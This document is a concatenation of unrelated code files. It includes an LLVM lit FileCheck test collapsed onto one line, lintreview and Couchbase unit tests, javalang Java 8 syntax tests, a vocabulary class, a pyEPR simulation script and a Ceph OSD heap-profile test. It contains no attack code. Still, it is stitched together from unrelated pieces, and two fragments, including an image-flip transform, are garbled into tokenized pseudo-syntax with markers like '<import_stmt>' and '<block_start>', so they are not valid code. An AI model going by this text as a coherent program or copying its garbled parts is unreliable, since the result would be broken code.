# Check the various features of the ShTest format. # # RUN: rm -f %t.xml # RUN: not %{lit} -j 1 -v %{inputs}/shtest-format --xunit-xml-output %t.xml > %t.out # RUN: FileCheck < %t.out %s # RUN: FileCheck --check-prefix=XUNIT < %t.xml %s # END. # CHECK: -- Testing: # CHECK: PASS: shtest-format :: argv0.txt # CHECK: FAIL: shtest-format :: external_shell/fail.txt # CHECK-NEXT: *** TEST 'shtest-format :: external_shell/fail.txt' FAILED *** # CHECK: Command Output (stdout): # CHECK-NEXT: -- # CHECK-NEXT: line 1: failed test output on stdout # CHECK-NEXT: line 2: failed test output on stdout # CHECK: Command Output (stderr): # CHECK-NEXT: -- # CHECK-NEXT: cat{{(\.exe)?}}: {{cannot open does-not-exist|does-not-exist: No such file or directory}} # CHECK: -- # CHECK: FAIL: shtest-format :: external_shell/fail_with_bad_encoding.txt # CHECK-NEXT: *** TEST 'shtest-format :: external_shell/fail_with_bad_encoding.txt' FAILED *** # CHECK: Command Output (stdout): # CHECK-NEXT: -- # CHECK-NEXT: a line with bad encoding: # CHECK: -- # CHECK: PASS: shtest-format :: external_shell/pass.txt # CHECK: FAIL: shtest-format :: fail.txt # CHECK-NEXT: *** TEST 'shtest-format :: fail.txt' FAILED *** # CHECK-NEXT: Script: # CHECK-NEXT: -- # CHECK-NEXT: printf "line 1 # CHECK-NEXT: false # CHECK-NEXT: -- # CHECK-NEXT: Exit Code: 1 # # CHECK: Command Output (stdout): # CHECK-NEXT: -- # CHECK-NEXT: $ ":" "RUN: at line 1" # CHECK-NEXT: $ "printf" # CHECK-NEXT: # command output: # CHECK-NEXT: line 1: failed test output on stdout # CHECK-NEXT: line 2: failed test output on stdout # CHECK: UNRESOLVED: shtest-format :: no-test-line.txt # CHECK: PASS: shtest-format :: pass.txt # CHECK: UNSUPPORTED: shtest-format :: requires-missing.txt # CHECK: PASS: shtest-format :: requires-present.txt # CHECK: UNRESOLVED: shtest-format :: requires-star.txt # CHECK: UNSUPPORTED: shtest-format :: requires-triple.txt # CHECK: PASS: shtest-format :: unsupported-expr-false.txt # CHECK: UNSUPPORTED: shtest-format :: 
unsupported-expr-true.txt # CHECK: UNRESOLVED: shtest-format :: unsupported-star.txt # CHECK: UNSUPPORTED: shtest-format :: unsupported_dir/some-test.txt # CHECK: PASS: shtest-format :: xfail-expr-false.txt # CHECK: XFAIL: shtest-format :: xfail-expr-true.txt # CHECK: XFAIL: shtest-format :: xfail-feature.txt # CHECK: XFAIL: shtest-format :: xfail-target.txt # CHECK: XFAIL: shtest-format :: xfail.txt # CHECK: XPASS: shtest-format :: xpass.txt # CHECK-NEXT: *** TEST 'shtest-format :: xpass.txt' FAILED *** # CHECK-NEXT: Script # CHECK-NEXT: -- # CHECK-NEXT: true # CHECK-NEXT: -- # CHECK: Testing Time # CHECK: Unexpected Passing Tests (1) # CHECK: shtest-format :: xpass.txt # CHECK: Failing Tests (3) # CHECK: shtest-format :: external_shell/fail.txt # CHECK: shtest-format :: external_shell/fail_with_bad_encoding.txt # CHECK: shtest-format :: fail.txt # CHECK: Expected Passes : 7 # CHECK: Expected Failures : 4 # CHECK: Unsupported Tests : 4 # CHECK: Unresolved Tests : 3 # CHECK: Unexpected Passes : 1 # CHECK: Unexpected Failures: 3 # XUNIT: <?xml version="1.0" encoding="UTF-8" ?> # XUNIT-NEXT: <testsuites> # XUNIT-NEXT: <testsuite name="shtest-format" tests="22" failures="7" skipped="4"> # XUNIT: <testcase classname="shtest-format.shtest-format" name="argv0.txt" time="{{[0-9]+\.[0-9]+}}"/> # XUNIT: <testcase classname="shtest-format.external_shell" name="fail.txt" time="{{[0-9]+\.[0-9]+}}"> # XUNIT-NEXT: <failure{{[ ]*}}> # XUNIT: </failure> # XUNIT-NEXT: </testcase> # XUNIT: <testcase classname="shtest-format.external_shell" name="fail_with_bad_encoding.txt" time="{{[0-9]+\.[0-9]+}}"> # XUNIT-NEXT: <failure{{[ ]*}}> # XUNIT: </failure> # XUNIT-NEXT: </testcase> # XUNIT: <testcase classname="shtest-format.external_shell" name="pass.txt" time="{{[0-9]+\.[0-9]+}}"/> # XUNIT: <testcase classname="shtest-format.shtest-format" name="fail.txt" time="{{[0-9]+\.[0-9]+}}"> # XUNIT-NEXT: <failure{{[ ]*}}> # XUNIT: </failure> # XUNIT-NEXT: </testcase> # XUNIT: <testcase 
classname="shtest-format.shtest-format" name="no-test-line.txt" time="{{[0-9]+\.[0-9]+}}"> # XUNIT-NEXT: <failure{{[ ]*}}> # XUNIT: </failure> # XUNIT-NEXT: </testcase> # XUNIT: <testcase classname="shtest-format.shtest-format" name="pass.txt" time="{{[0-9]+\.[0-9]+}}"/> # XUNIT: <testcase classname="shtest-format.shtest-format" name="requires-missing.txt" time="{{[0-9]+\.[0-9]+}}"> # XUNIT-NEXT:<skipped message="Skipping because of: a-missing-feature" /> # XUNIT: <testcase classname="shtest-format.shtest-format" name="requires-present.txt" time="{{[0-9]+\.[0-9]+}}"/> # XUNIT: <testcase classname="shtest-format.shtest-format" name="requires-star.txt" time="{{[0-9]+\.[0-9]+}}"> # XUNIT-NEXT: <failure{{[ ]*}}> # XUNIT: </failure> # XUNIT-NEXT: </testcase> # XUNIT: <testcase classname="shtest-format.shtest-format" name="requires-triple.txt" time="{{[0-9]+\.[0-9]+}}"> # XUNIT-NEXT:<skipped message="Skipping because of: x86_64" /> # XUNIT: <testcase classname="shtest-format.shtest-format" name="unsupported-expr-false.txt" time="{{[0-9]+\.[0-9]+}}"/> # XUNIT: <testcase classname="shtest-format.shtest-format" name="unsupported-expr-true.txt" time="{{[0-9]+\.[0-9]+}}"> # XUNIT-NEXT:<skipped message="Skipping because of configuration." /> # XUNIT: <testcase classname="shtest-format.shtest-format" name="unsupported-star.txt" time="{{[0-9]+\.[0-9]+}}"> # XUNIT-NEXT: <failure{{[ ]*}}> # XUNIT: </failure> # XUNIT-NEXT: </testcase> # XUNIT: <testcase classname="shtest-format.unsupported_dir" name="some-test.txt" time="{{[0-9]+\.[0-9]+}}"> # XUNIT-NEXT:<skipped message="Skipping because of configuration." 
/> # XUNIT: <testcase classname="shtest-format.shtest-format" name="xfail-expr-false.txt" time="{{[0-9]+\.[0-9]+}}"/> # XUNIT: <testcase classname="shtest-format.shtest-format" name="xfail-expr-true.txt" time="{{[0-9]+\.[0-9]+}}"/> # XUNIT: <testcase classname="shtest-format.shtest-format" name="xfail-feature.txt" time="{{[0-9]+\.[0-9]+}}"/> # XUNIT: <testcase classname="shtest-format.shtest-format" name="xfail-target.txt" time="{{[0-9]+\.[0-9]+}}"/> # XUNIT: <testcase classname="shtest-format.shtest-format" name="xfail.txt" time="{{[0-9]+\.[0-9]+}}"/> # XUNIT: <testcase classname="shtest-format.shtest-format" name="xpass.txt" time="{{[0-9]+\.[0-9]+}}"> # XUNIT-NEXT: <failure{{[ ]*}}> # XUNIT: </failure> # XUNIT-NEXT: </testcase> # XUNIT: </testsuite> # XUNIT-NEXT: </testsuites>
import sys

# Filter a build log: echo every line except those produced by expected,
# harmless compiler probes.
log_file_path = sys.argv[1]
with open(log_file_path) as f:
    lines = f.readlines()

# Ignore errors from CPU instruction set probes ('src.c'), symbol
# existence testing ('CheckSymbolExists.c'), and the compilation error
# formatting test. Hoisted out of the loop - the original rebuilt this
# list once per log line - and rewritten with `not any(...)` instead of
# `all([... not in ...])`, which also avoids materializing a list.
IGNORED_KEYWORDS = (
    'src.c',
    'CheckSymbolExists.c',
    'test_compilation_error_formatting',
)

for line in lines:
    if not any(keyword in line for keyword in IGNORED_KEYWORDS):
        print(line)
from unittest import TestCase

from lintreview.fixers.commit_strategy import CommitStrategy
from lintreview.fixers.error import WorkflowError
from mock import patch, Mock, sentinel

from ..test_git import setup_repo, teardown_repo, clone_path


class TestCommitStrategy(TestCase):
    """Tests for the commit-based fixer workflow strategy."""

    def setUp(self):
        setup_repo()

    def tearDown(self):
        teardown_repo()

    def _make_context(self, pull):
        # Build the standard strategy context used by the execute() tests.
        return {
            'repo_path': clone_path,
            'author_name': 'lintbot',
            'author_email': '<EMAIL>',
            'pull_request': pull,
        }

    def test_init_key_requirements(self):
        # Dropping any single required key must make the constructor raise.
        required = {
            'repo_path': 'some/path',
            'author_email': 'lintbot',
            'author_name': '<EMAIL>',
            'pull_request': 'pull#1',
        }
        for missing in required:
            context = {key: val for key, val in required.items()
                       if key != missing}
            self.assertRaises(KeyError, CommitStrategy, context)

    @patch('lintreview.git.commit')
    @patch('lintreview.git.push')
    @patch('lintreview.git.apply_cached')
    def test_execute__push_error(self, mock_apply, mock_push, mock_commit):
        # A rejected push surfaces as a WorkflowError.
        mock_push.side_effect = IOError(
            '! [remote rejected] stylefixes -> add_date_to_obs '
            '(permission denied)\nerror: failed to push some refs to')
        pull = Mock(head_branch='patch-1',
                    from_private_fork=False,
                    maintainer_can_modify=True)
        strategy = CommitStrategy(self._make_context(pull))

        diff = Mock()
        diff.as_diff.return_value = sentinel.diff
        self.assertRaises(WorkflowError, strategy.execute, [diff])

    @patch('lintreview.git.commit')
    @patch('lintreview.git.push')
    @patch('lintreview.git.apply_cached')
    def test_execute__git_flow(self, mock_apply, mock_push, mock_commit):
        # Happy path: diff applied, committed, and pushed to the head branch.
        pull = Mock(head_branch='patch-1',
                    from_private_fork=False,
                    maintainer_can_modify=True)
        strategy = CommitStrategy(self._make_context(pull))

        diff = Mock()
        diff.as_diff.return_value = sentinel.diff
        out = strategy.execute([diff])
        self.assertIsNone(out)

        mock_commit.assert_called_with(
            clone_path,
            'lintbot <<EMAIL>>',
            'Fixing style errors.')
        mock_push.assert_called_with(
            clone_path,
            'origin',
            'stylefixes:patch-1')
        mock_apply.assert_called_with(
            clone_path,
            sentinel.diff)

    @patch('lintreview.git.commit')
    def test_execute__no_maintainer_modify(self, mock_commit):
        # Maintainers may not modify the branch: refuse before committing.
        pull = Mock(head_branch='patch-1',
                    maintainer_can_modify=False,
                    from_private_fork=False)
        strategy = CommitStrategy(self._make_context(pull))

        diff = Mock()
        diff.as_diff.return_value = sentinel.diff
        with self.assertRaises(WorkflowError) as err:
            strategy.execute([diff])
        self.assertIn('Cannot apply automatic fixing', str(err.exception))
        self.assertIn('modified by maintainers', str(err.exception))
        self.assertEqual(0, mock_commit.call_count)

    @patch('lintreview.git.commit')
    def test_execute__private_fork(self, mock_commit):
        # Private forks cannot be pushed to: refuse before committing.
        pull = Mock(head_branch='patch-1',
                    maintainer_can_modify=True,
                    from_private_fork=True)
        strategy = CommitStrategy(self._make_context(pull))

        diff = Mock()
        diff.as_diff.return_value = sentinel.diff
        with self.assertRaises(WorkflowError) as err:
            strategy.execute([diff])
        self.assertIn('Cannot apply automatic fixing', str(err.exception))
        self.assertIn('private fork', str(err.exception))
        self.assertEqual(0, mock_commit.call_count)
import asyncio

from couchbase.asynchronous import AsyncSearchResult
from couchbase.asynchronous import AsyncAnalyticsResult
from .fixtures import asynct, AioTestCase
from couchbase.exceptions import CouchbaseException, SearchException, NotSupportedException
from unittest import SkipTest
import couchbase.search as SEARCH


class CouchbaseBeerTest(AioTestCase):
    """Base class for tests that require the 'beer-sample' sample bucket."""

    def setUp(self, **kwargs):
        try:
            return super(CouchbaseBeerTest, self).setUp(
                bucket='beer-sample', **kwargs)
        except CouchbaseException:
            # The sample bucket is optional; skip rather than error out.
            raise SkipTest("Need 'beer-sample' bucket for this")


class CouchbaseBeerKVTest(CouchbaseBeerTest):
    """Key/value operations against the beer-sample bucket."""

    def setUp(self):
        super(CouchbaseBeerKVTest, self).setUp()

    @asynct
    @asyncio.coroutine
    def test_get_data(self):
        # Fetch a known document and verify its content.
        connargs = self.make_connargs(bucket='beer-sample')
        beer_default_collection = self.gen_collection(**connargs)
        # on_connect() may return None when already connected; fall back to
        # a short sleep so there is always something to await.
        yield from (beer_default_collection.on_connect() or
                    asyncio.sleep(0.01))

        data = yield from beer_default_collection.get(
            '21st_amendment_brewery_cafe')
        self.assertEqual("21st Amendment Brewery Cafe", data.content["name"])


class CouchbaseBeerViewTest(CouchbaseBeerTest):
    """View queries against the beer-sample bucket."""

    def setUp(self):
        super(CouchbaseBeerViewTest, self).setUp(type='Bucket')

    @asynct
    @asyncio.coroutine
    def test_query(self):
        beer_bucket = self.gen_cluster(
            **self.make_connargs()).bucket('beer-sample')

        yield from (beer_bucket.on_connect() or asyncio.sleep(0.01))
        viewiter = beer_bucket.view_query("beer", "brewery_beers", limit=10)
        yield from viewiter.future

        count = len(list(viewiter))
        self.assertEqual(count, 10)


class CouchbaseDefaultTestKV(AioTestCase):
    """Key/value operations against the default test bucket."""

    @asynct
    @asyncio.coroutine
    def test_upsert(self):
        import uuid
        # Use a fresh value so a stale document cannot make the test pass.
        expected = str(uuid.uuid4())
        default_collection = self.gen_collection(**self.make_connargs())
        yield from (default_collection.on_connect() or asyncio.sleep(0.01))

        yield from default_collection.upsert('hello', {"key": expected})

        obtained = yield from default_collection.get('hello')
        self.assertEqual({"key": expected}, obtained.content)


class AIOClusterTest(AioTestCase):
    """Cluster-level query and search operations."""

    def setUp(self, **kwargs):
        super(AIOClusterTest, self).setUp(**kwargs)

    @asynct
    @asyncio.coroutine
    def test_n1ql(self):
        cluster = self.gen_cluster(**self.make_connargs())
        yield from (cluster.on_connect() or asyncio.sleep(0.01))

        it = cluster.query(self.query_props.statement)
        yield from it.future
        data = list(it)
        self.assertEqual(self.query_props.rowcount, len(data))

    @asynct
    @asyncio.coroutine
    def test_search(self):  # type: Base
        cluster = self.gen_cluster(**self.make_connargs())
        yield from (cluster.on_connect() or asyncio.sleep(0.01))
        try:
            it = cluster.search_query(
                "beer-search", SEARCH.TermQuery("category"),
                facets={'fred': SEARCH.TermFacet('category', 10)})
            yield from it.future
            data = list(it)
            self.assertIsInstance(it, AsyncSearchResult)
            self.assertEqual(10, len(data))
        except SearchException as e:
            # The mock server does not implement search; skip there.
            if isinstance(e.inner_cause,
                          NotSupportedException) and self.is_mock:
                raise SkipTest("Not supported")


class AnalyticsTest(AioTestCase):
    """Analytics queries."""

    # BUG FIX: the original method used `yield from` but was missing the
    # @asynct/@asyncio.coroutine decorators every sibling coroutine test
    # carries - the test runner therefore only created a generator and the
    # test body never actually ran. The decorators make it execute.
    @asynct
    @asyncio.coroutine
    def testBatchedAnalytics(self):  # type: Base
        cluster = self.gen_cluster(**self.make_connargs())
        yield from (cluster.on_connect() or asyncio.sleep(0.01))

        it = cluster.analytics_query(
            "SELECT * FROM `{}` LIMIT 1".format(self.dataset_name))
        yield from it.future
        self.assertIsInstance(it, AsyncAnalyticsResult)
        self.assertEqual(1, len(it.rows()))
import unittest

from pkg_resources import resource_string

from .. import parse, parser, tree


def setup_java_class(content_to_add):
    """Return the source of an example Java class whose main() method body
    is content_to_add."""
    template = """
public class Lambda {

    public static void main(String args[]) {
        %s
    }

}
"""
    return template % content_to_add


def filter_type_in_method(clazz, the_type, method_name):
    """Yield the (path, node) pairs of the_type found inside the method of
    clazz identified by method_name."""
    for path, node in clazz.filter(the_type):
        for ancestor in reversed(path):
            if isinstance(ancestor, tree.MethodDeclaration) \
                    and ancestor.name == method_name:
                yield path, node


class LambdaSupportTest(unittest.TestCase):
    """Tests for Java 8 lambda syntax."""

    def assert_contains_lambda_expression_in_m(self, clazz,
                                               method_name='main'):
        """Fail unless clazz contains a lambda expression inside the method
        named method_name; return the matches otherwise."""
        matches = list(filter_type_in_method(
            clazz, tree.LambdaExpression, method_name))
        if not matches:
            self.fail('No matching lambda expression found.')
        return matches

    def _assert_parses_with_lambda(self, snippet):
        # Parse the snippet inside the example class and check the lambda
        # is recognized.
        self.assert_contains_lambda_expression_in_m(
            parse.parse(setup_java_class(snippet)))

    def test_lambda_support_no_parameters_no_body(self):
        """A lambda with no parameters and no body parses."""
        self._assert_parses_with_lambda("() -> {};")

    def test_lambda_support_no_parameters_expression_body(self):
        """Lambdas with no parameters and an expression body parse."""
        for snippet in ("() -> 3;",
                        "() -> null;",
                        "() -> { return 21; };",
                        "() -> { System.exit(1); };"):
            self._assert_parses_with_lambda(snippet)

    def test_lambda_support_no_parameters_complex_expression(self):
        """A lambda with no parameters and a complex body parses."""
        code = """
                () -> {
                    if (true) return 21;
                    else {
                        int result = 21;
                        return result / 2;
                    }
                };"""
        self._assert_parses_with_lambda(code)

    def test_parameter_no_type_expression_body(self):
        """Lambda parameters with inferred types parse."""
        for snippet in ("(bar) -> bar + 1;",
                        "bar -> bar + 1;",
                        "x -> x.length();",
                        "y -> { y.boom(); };"):
            self._assert_parses_with_lambda(snippet)

    def test_parameter_with_type_expression_body(self):
        """Lambda parameters with formal types parse."""
        for snippet in ("(int foo) -> { return foo + 2; };",
                        "(String s) -> s.length();",
                        "(int foo) -> foo + 1;",
                        "(Thread th) -> { th.start(); };",
                        "(String foo, String bar) -> foo + bar;"):
            self._assert_parses_with_lambda(snippet)

    def test_parameters_with_no_type_expression_body(self):
        """Multiple lambda parameters with inferred types parse."""
        self._assert_parses_with_lambda("(x, y) -> x + y;")

    def test_parameters_with_mixed_inferred_and_declared_types(self):
        """Mixing inferred and declared parameter types is a syntax error,
        as the specification requires."""
        with self.assertRaises(parser.JavaSyntaxError):
            parse.parse(setup_java_class("(x, int y) -> x+y;"))

    def test_parameters_inferred_types_with_modifiers(self):
        """Modifiers on inferred-type lambda parameters are a syntax error,
        as the specification requires."""
        with self.assertRaises(parser.JavaSyntaxError):
            parse.parse(setup_java_class("(x, final y) -> x+y;"))

    def test_invalid_parameters_are_invalid(self):
        """Malformed lambda parameter lists are rejected."""
        with self.assertRaises(parser.JavaSyntaxError):
            parse.parse(setup_java_class("(a b c) -> {};"))

    def test_cast_works(self):
        """A cast expression still parses alongside lambda support."""
        parse.parse(setup_java_class("String x = (String) A.x() ;"))


class MethodReferenceSyntaxTest(unittest.TestCase):
    """Tests for Java 8 method reference syntax."""

    def assert_contains_method_reference_expression_in_m(
            self, clazz, method_name='main'):
        """Fail unless clazz contains a method reference inside the method
        named method_name; return the matches otherwise."""
        matches = list(filter_type_in_method(
            clazz, tree.MethodReference, method_name))
        if not matches:
            self.fail('No matching method reference found.')
        return matches

    def _assert_parses_with_method_reference(self, snippet):
        self.assert_contains_method_reference_expression_in_m(
            parse.parse(setup_java_class(snippet)))

    def test_method_reference(self):
        """A plain method reference parses."""
        self._assert_parses_with_method_reference("String::length;")

    def test_method_reference_to_the_new_method(self):
        """A constructor reference (::new) parses."""
        self._assert_parses_with_method_reference("String::new;")

    def test_method_reference_to_the_new_method_with_explict_type(self):
        """A constructor reference with an explicit type argument parses."""
        self._assert_parses_with_method_reference("String::<String> new;")

    def test_method_reference_from_super(self):
        """A method reference from 'super' parses."""
        self._assert_parses_with_method_reference("super::toString;")

    def test_method_reference_from_super_with_identifier(self):
        """A method reference from Identifier.super parses."""
        self._assert_parses_with_method_reference("String.super::toString;")

    @unittest.expectedFailure
    def test_method_reference_explicit_type_arguments_for_generic_type(self):
        """Method references on a generic type are not supported yet."""
        self._assert_parses_with_method_reference("List<String>::size;")

    def test_method_reference_explicit_type_arguments(self):
        """A method reference with explicit type arguments parses."""
        self._assert_parses_with_method_reference("Arrays::<String> sort;")

    @unittest.expectedFailure
    def test_method_reference_from_array_type(self):
        """Method references from an array type are not supported yet."""
        self._assert_parses_with_method_reference("int[]::new;")


class InterfaceSupportTest(unittest.TestCase):
    """Tests for Java 8 interface extensions."""

    def test_interface_support_static_methods(self):
        parse.parse("""
interface Foo {
    void foo();

    static Foo create() {
        return new Foo() {
            @Override
            void foo() {
                System.out.println("foo");
            }
        };
    }
}
        """)

    def test_interface_support_default_methods(self):
        parse.parse("""
interface Foo {
    default void foo() {
        System.out.println("foo");
    }
}
        """)


def main():
    unittest.main()


if __name__ == '__main__':
    main()
__all__=["ConsigneeId" "PackageStatus"]<import_from_stmt>shipping.domain.value_objects.package_status PackageStatus<line_sep>ConsigneeId=int<line_sep>
from gzip import compress, GzipFile

import numpy as np

from .record import Record

# Sentinel tokens expected to be present in every vocabulary.
UNK = '<unk>'
PAD = '<pad>'


class Vocab(Record):
    """Word vocabulary with per-word counts and a gzip-backed binary format."""

    __attributes__ = ['words', 'counts']

    def __init__(self, words, counts):
        self.words = words
        self.counts = counts
        # word -> row index; also used to resolve the unk/pad slots below.
        self.word_ids = {token: index for index, token in enumerate(self.words)}
        self.unk_id = self.word_ids.get(UNK)
        self.pad_id = self.word_ids.get(PAD)

    def __getitem__(self, word):
        return self.word_ids[word]

    def __contains__(self, word):
        return word in self.word_ids

    def get(self, word, default=None):
        """Return the id of *word*, or *default* when it is out of vocabulary."""
        return self[word] if word in self else default

    def count(self, word):
        """Count recorded for *word* (raises KeyError when unknown)."""
        return self.counts[self.word_ids[word]]

    def top(self, count=None):
        """The *count* most frequent words (all words when *count* is None)."""
        ranked = sorted(self.words, key=self.count, reverse=True)
        return ranked[:count]

    def sampled(self, words):
        """New Vocab restricted to *words*, keeping their original counts."""
        subset = list(words)
        subset_counts = [self.counts[self.word_ids[token]] for token in subset]
        return Vocab(subset, subset_counts)

    def __repr__(self):
        return '{name}(words=[...], counts=[...])'.format(name=self.__class__.__name__)

    def _repr_pretty_(self, printer, cycle):
        printer.text(repr(self))

    @classmethod
    def from_glove(cls, words, counts):
        """Build a Vocab from raw GloVe vocab entries (bytes), appending UNK/PAD."""
        # for some reason glove vocab may have words with broken # unicode
        decoded = [token.decode('utf8', errors='ignore') for token in words]
        # emb has unk in the end
        for token in (UNK, PAD):
            decoded.append(token)
            counts.append(0)
        return cls(decoded, counts)

    @property
    def as_glove(self):
        """Yield (utf8-encoded word, count) pairs, skipping the UNK/PAD sentinels."""
        for token, freq in zip(self.words, self.counts):
            if token in (UNK, PAD):
                continue
            yield token.encode('utf8'), freq

    @property
    def as_bytes(self):
        """Gzip-compressed dump: uint32 size header, uint32 counts, utf8 words."""
        size_header = np.array([len(self.counts)]).astype(np.uint32).tobytes()
        packed_counts = np.array(self.counts, dtype=np.uint32).tobytes()
        packed_words = '\n'.join(self.words).encode('utf8')
        return compress(size_header + packed_counts + packed_words)

    @classmethod
    def from_file(cls, file):
        """Inverse of `as_bytes`: load a Vocab from a gzip-compressed stream."""
        stream = GzipFile(mode='rb', fileobj=file)
        size, = np.frombuffer(stream.read(4), np.uint32)
        counts = np.frombuffer(stream.read(4 * size), np.uint32).tolist()
        words = stream.read().decode('utf8').splitlines()
        return cls(words, counts)
# -*- coding: utf-8 -*-
"""
Created on Tue Aug 22 11:21:01 2017

@author: Zlatko
"""
from pyEPR import *

# Stage 1 (disabled): drive HFSS and run the distributed EPR field analysis.
if False:
    # Specify the HFSS project to be analyzed
    project_info = ProjectInfo(r"X:\Simulation\\hfss\\KC\\")
    # Project / design / setup names; "None" selects the currently active one.
    project_info.project_name = '2013-12-03_9GHzCavity'
    project_info.design_name = '9GHz_EM_center_SNAIL'
    project_info.setup_name = None

    # Describe the junctions in the HFSS design.
    project_info.junctions['snail'] = {'rect': 'qubit', 'line': 'JunctionLine',
                                       'Lj_variable': 'LJ', 'length': 0.0001}
    # project_info.junctions['jBob'] = {'rect': 'qubitBob', 'line': 'bob_line',
    #                                   'Lj_variable': 'LJBob', 'length': 0.0001}

    # Dissipative elements for the EPR loss estimate; there are more options
    # in project_info.dissipative.
    project_info.dissipative['dielectric_surfaces'] = None

    # Run analysis
    epr_hfss = DistributedAnalysis(project_info)
    epr_hfss.do_EPR_analysis()

# variations = ['1', '70']

# Stage 2: Hamiltonian (quantum) analysis of a previously saved EPR result.
if True:
    # filename = epr_hfss.data_filename
    filename = r'X:\Simulation\hfss\KC\pyEPR_results_2018\2013-12-03_9GHzCavity\9GHz_EM_center_SNAIL\9GHz_EM_center_SNAIL_20180726_170049.hdf5'
    # filename = r'C:\\Users\\rslqulab\\Desktop\\zkm\\2017_pyEPR_data\\\\/2017_08_Zlatko_Shyam_AutStab/2 pyEPR/2 pyEPR_20170825_170550.hdf5'
    epr = QuantumAnalysis(filename)
    # result = epr.analyze_variation('1', cos_trunc = 8, fock_trunc = 7)
    epr.analyze_all_variations(cos_trunc=None, fock_trunc=4)  # only quadratic part
    epr.plot_hamiltonian_results()

    if True:
        from pyEPR.toolbox_plotting import cmap_discrete

        f0 = epr.results.get_frequencies_HFSS()
        f1 = epr.results.get_frequencies_O1()
        chi = epr.results.get_chi_O1()
        mode_idx = list(f0.index)
        nmodes = len(mode_idx)
        cmap = cmap_discrete(nmodes)
<import_stmt>random<import_stmt>numpy<as>np<import_stmt>cv2<import_from_stmt>utils.transforms.transforms CustomTransform<class_stmt>RandomFlip(CustomTransform)<block_start><def_stmt>__init__ self prob_x=0 prob_y=0<block_start>""" Arguments: ---------- prob_x: range [0, 1], probability to use horizontal flip, setting to 0 means disabling flip prob_y: range [0, 1], probability to use vertical flip """<line_sep>self.prob_x=prob_x<line_sep>self.prob_y=prob_y<block_end><def_stmt>__call__ self sample<block_start>img=sample.get('img').copy()<line_sep>segLabel=sample.get('segLabel' <none>)<if_stmt>segLabel<is><not><none><block_start>segLabel=segLabel.copy()<block_end>flip_x=np.random.choice([<false> <true>] p=(1-self.prob_x self.prob_x))<line_sep>flip_y=np.random.choice([<false> <true>] p=(1-self.prob_y self.prob_y))<if_stmt>flip_x<block_start>img=np.ascontiguousarray(np.flip(img axis=1))<if_stmt>segLabel<is><not><none><block_start>segLabel=np.ascontiguousarray(np.flip(segLabel axis=1))<block_end><block_end><if_stmt>flip_y<block_start>img=np.ascontiguousarray(np.flip(img axis=0))<if_stmt>segLabel<is><not><none><block_start>segLabel=np.ascontiguousarray(np.flip(segLabel axis=0))<block_end><block_end>_sample=sample.copy()<line_sep>_sample['img']=img<line_sep>_sample['segLabel']=segLabel<line_sep><return>_sample<block_end><block_end><class_stmt>Darkness(CustomTransform)<block_start><def_stmt>__init__ self coeff<block_start><assert_stmt>coeff<ge>1. "Darkness coefficient must be greater than 1"<line_sep>self.coeff=coeff<block_end><def_stmt>__call__ self sample<block_start>img=sample.get('img')<line_sep>coeff=np.random.uniform(1. self.coeff)<line_sep>img=(img.astype('float32')/coeff).astype('uint8')<line_sep>_sample=sample.copy()<line_sep>_sample['img']=img<line_sep><return>_sample<block_end><block_end>
import logging
import pytest
import time
import random

from ocs_ci.framework.testlib import (
    ManageTest,
    tier2,
    skipif_ocs_version,
    bugzilla,
    skipif_external_mode,
)
from ocs_ci.ocs.resources.pod import get_ceph_tools_pod, get_osd_pods, get_osd_pod_id
from ocs_ci.utility.utils import TimeoutSampler
from ocs_ci.ocs.exceptions import CommandFailed

log = logging.getLogger(__name__)


@tier2
@bugzilla("1938049")
@skipif_ocs_version("<4.6")
@pytest.mark.polarion_id("OCS-2512")
@skipif_external_mode
class TestOSDHeapProfile(ManageTest):
    """
    1.Start heap profiler for osd
      $ oc exec rook-ceph-tools-85ccf9f7c5-v7bgk ceph tell osd.0 heap start_profiler

    2.Dump heap profile
      $ oc exec rook-ceph-tools-85ccf9f7c5-v7bgk ceph tell osd.0 heap dump

    3.Get heap profile in /var/log/ceph dir on osd node
      $ oc rsh rook-ceph-osd-0-959dbdc6d-pddd4
      sh-4.4# ls -ltr /var/log/ceph/
      -rw-r--r--. 1 ceph ceph  295891 Apr 11 14:33 osd.0.profile.0001.heap
    """

    def test_osd_heap_profile(self):
        """
        Generate heap profile dump file for OSDs and verify whether the file
        is created on '/var/log/ceph/'

        """
        strings_err = ["error", "fail"]
        osd_pods = get_osd_pods()
        # Pick one OSD at random; ids are assumed to run 0..len(osd_pods)-1.
        osd_id = str(random.randint(0, len(osd_pods) - 1))

        log.info(f"Start heap profiler for osd-{osd_id}")
        pod_tool = get_ceph_tools_pod()
        out = pod_tool.exec_cmd_on_pod(
            command=f"ceph tell osd.{osd_id} heap start_profiler", out_yaml_format=False
        )
        # Consistency fix: always log through the module logger ('log'), not
        # the root logger via the logging module directly.
        log.info(f"command output:{out}")
        for string_err in strings_err:
            assert (
                string_err not in out.lower()
            ), f"{string_err} on the output command {out}"

        log.info("Sleep 10 sec, for running heap profiler")
        time.sleep(10)

        log.info("Dump heap profile")
        out = pod_tool.exec_sh_cmd_on_pod(command=f"ceph tell osd.{osd_id} heap dump")
        log.info(out)
        for string_err in strings_err:
            assert (
                string_err not in out.lower()
            ), f"{string_err} on the output command {out}"

        log.info(f"Get osd-{osd_id} pod object")
        # Robustness fix: previously 'osd_pod_profile' stayed unbound (NameError)
        # when no pod id matched; fail with an explicit error instead.
        osd_pod_profile = next(
            (osd_pod for osd_pod in osd_pods if get_osd_pod_id(osd_pod) == osd_id),
            None,
        )
        if osd_pod_profile is None:
            raise ValueError(f"No OSD pod found with id {osd_id}")

        osd_profile_str = f"osd.{osd_id}.profile"
        log.info(f"Verify {osd_profile_str} log exist on /var/log/ceph/")
        sample = TimeoutSampler(
            timeout=100,
            sleep=10,
            func=self.verify_output_command_osd_pod,
            command="ls -ltr /var/log/ceph/",
            pod_obj=osd_pod_profile,
            str_to_check=osd_profile_str,
        )
        if not sample.wait_for_func_status(result=True):
            log.error(f"{osd_profile_str} log does not exist on /var/log/ceph")
            raise ValueError(f"{osd_profile_str} log does not exist on /var/log/ceph")
        log.info(f"osd.{osd_id}.profile log exist on /var/log/ceph")

    def verify_output_command_osd_pod(self, command, pod_obj, str_to_check):
        """
        Check the output of the command (from osd pod)

        Args:
            command (str): command run on osd pod
            pod_obj (obj): pod object
            str_to_check (str): check if the string is contained on output command

        Returns:
            bool: True if we find the string in output, False otherwise

        """
        try:
            out = pod_obj.exec_cmd_on_pod(command=command)
            log.info(f"the output of the command {command}: {out}")
            # Idiom fix: 'True if x else False' collapsed to the expression.
            return str_to_check in out
        except CommandFailed as e:
            log.error(e)
            return False
